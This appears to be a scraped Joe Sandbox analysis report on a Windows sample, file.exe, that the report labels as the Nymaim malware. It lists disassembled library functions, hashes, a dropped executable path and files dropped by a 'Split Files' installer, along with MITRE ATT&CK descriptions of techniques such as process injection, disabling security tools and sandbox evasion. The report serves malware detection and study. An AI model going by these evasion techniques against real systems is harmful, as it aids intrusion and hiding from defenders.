Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 1e9a30f0aa94a2323565cf65184d44734a7f36b232426c1f8ee69eae81873c8a
Instruction ID: 754091b4909357f4be4cfe312f6ce61ff68f71e38662d858c4cdb25feceb8270
Opcode Fuzzy Hash: 1e9a30f0aa94a2323565cf65184d44734a7f36b232426c1f8ee69eae81873c8a
Instruction Fuzzy Hash: 611125F23002016BC6157B749DC6E6B326AABF5775B258324F3E1A31E1DFF19C928120

Uniqueness

Uniqueness Score: -1.00%

Function 00104267 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,001045D0,00107A92,?,001072C9,?,00000000,?,?,?,?,00107314,?,00000000), ref: 0010426C
_free.LIBCMT ref: 001042C9
_free.LIBCMT ref: 001042FF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,001045D0,00107A92,?,001072C9,?,00000000,?,?,?,?,00107314,?), ref: 0010430A

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 304b927c56cb9c8eba0294b2e284f488ff6ff312821e72b9da94313f03bb5e81
Instruction ID: b4f658f0c8957247a91083633b622922abdcb3425de72ac68e1dce5bb3950607
Opcode Fuzzy Hash: 304b927c56cb9c8eba0294b2e284f488ff6ff312821e72b9da94313f03bb5e81
Instruction Fuzzy Hash: 751121F2300200ABD61577B8ACC1E6E222AABD97747258324F3A5A71D1DFF18C628120

Uniqueness

Uniqueness Score: -1.00%

Function 00109AE6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00109549,?,00000001,?,00000001,?,001089E3,?,?,00000001), ref: 00109AFD
GetLastError.KERNEL32(?,00109549,?,00000001,?,00000001,?,001089E3,?,?,00000001,?,00000001,?,00108F2F,001071BC), ref: 00109B09

Part of subcall function 00109ACF: CloseHandle.KERNEL32(FFFFFFFE,00109B19,?,00109549,?,00000001,?,00000001,?,001089E3,?,?,00000001,?,00000001), ref: 00109ADF

___initconout.LIBCMT ref: 00109B19

Part of subcall function 00109A91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00109AC0,00109536,00000001,?,001089E3,?,?,00000001,?), ref: 00109AA4

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00109549,?,00000001,?,00000001,?,001089E3,?,?,00000001,?), ref: 00109B2E

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 173eecf2013616fa44d6d5e1e2f62713a518a27cc2afec11657ced16aad9f56a
Instruction ID: 0a5436c7a745b4d085b082689196e290d7ec9f9caa3a43d073d24b39222f9750
Opcode Fuzzy Hash: 173eecf2013616fa44d6d5e1e2f62713a518a27cc2afec11657ced16aad9f56a
Instruction Fuzzy Hash: 21F01C3A100119FBCF226FD6EC0998A3FA6FB083B0F058110FB9896561C7728C60DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00103A75 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00103A7E

Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663

_free.LIBCMT ref: 00103A91
_free.LIBCMT ref: 00103AA2
_free.LIBCMT ref: 00103AB3

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3f3cf405c92ecf7f591ceca09b18e3c8c0392dce230466f4fe791d3e798e9e60
Instruction ID: 2d1ca3a05918fbca388a5e6b75801bca9eee8418f05860bdcc9fb9b6afc0dae4
Opcode Fuzzy Hash: 3f3cf405c92ecf7f591ceca09b18e3c8c0392dce230466f4fe791d3e798e9e60
Instruction Fuzzy Hash: 42E0BFB15025609BCA0A7F24BF414C53F61F779B11305C406F56012A76D7F616E39FC9

Uniqueness

Uniqueness Score: -1.00%

Function 00102C9A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe, xrefs: 00102CDD, 00102CE4, 00102D1A

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
API String ID: 0-2800082724
Opcode ID: 1c270389c910286ea11530e4b0f50bb6cd8b1427b38ed0f5c97b9e4ce6233c9b
Instruction ID: a1eea62cf1f02cd670b8fac1797d53f870617f64c6b5ea9c9453337f2e44b04c
Opcode Fuzzy Hash: 1c270389c910286ea11530e4b0f50bb6cd8b1427b38ed0f5c97b9e4ce6233c9b
Instruction Fuzzy Hash: CA41A0B0A00218ABDB15EBD9DD89A9EBBB8EF95300F104066F540A7291E7F09E41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00105E1D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?), ref: 00105E29
GetFileType.KERNEL32 ref: 00105E93

Strings

PPhv, xrefs: 00105E29

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: FileInfoStartupType
String ID: PPhv
API String ID: 3016745765-2461518760
Opcode ID: 9e680a9fa47bed6ac09798638518900ce4f77680ed9e3b0a72574bd699f65376
Instruction ID: 4188a2e1c209bd19994efcb604a790f5aa8e17fb553680e69425ecc8b664c762
Opcode Fuzzy Hash: 9e680a9fa47bed6ac09798638518900ce4f77680ed9e3b0a72574bd699f65376
Instruction Fuzzy Hash: 7A21C632A00A159BD714DF6CC984AAFFBAAAF45350B184155E4C5D73D5D370DE42CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Nymaim

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Split Files\ReadMe - EN.txt (copy)

C:\Program Files (x86)\Split Files\ReadMe - RU.txt (copy)

C:\Program Files (x86)\Split Files\SplitFiles131.exe

C:\Program Files (x86)\Split Files\is-3OAED.tmp

C:\Program Files (x86)\Split Files\is-6QN6Q.tmp

C:\Program Files (x86)\Split Files\is-AGVDF.tmp

C:\Program Files (x86)\Split Files\is-JSP8F.tmp

C:\Program Files (x86)\Split Files\is-UJJ0L.tmp

C:\Program Files (x86)\Split Files\language\Arabic.ini (copy)

C:\Program Files (x86)\Split Files\language\Chinese.ini (copy)

C:\Program Files (x86)\Split Files\language\Dutch.ini (copy)

C:\Program Files (x86)\Split Files\language\English.ini (copy)

C:\Program Files (x86)\Split Files\language\French.ini (copy)

C:\Program Files (x86)\Split Files\language\Italian.ini (copy)

C:\Program Files (x86)\Split Files\language\Russian.ini (copy)

Windows Analysis Report
file.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre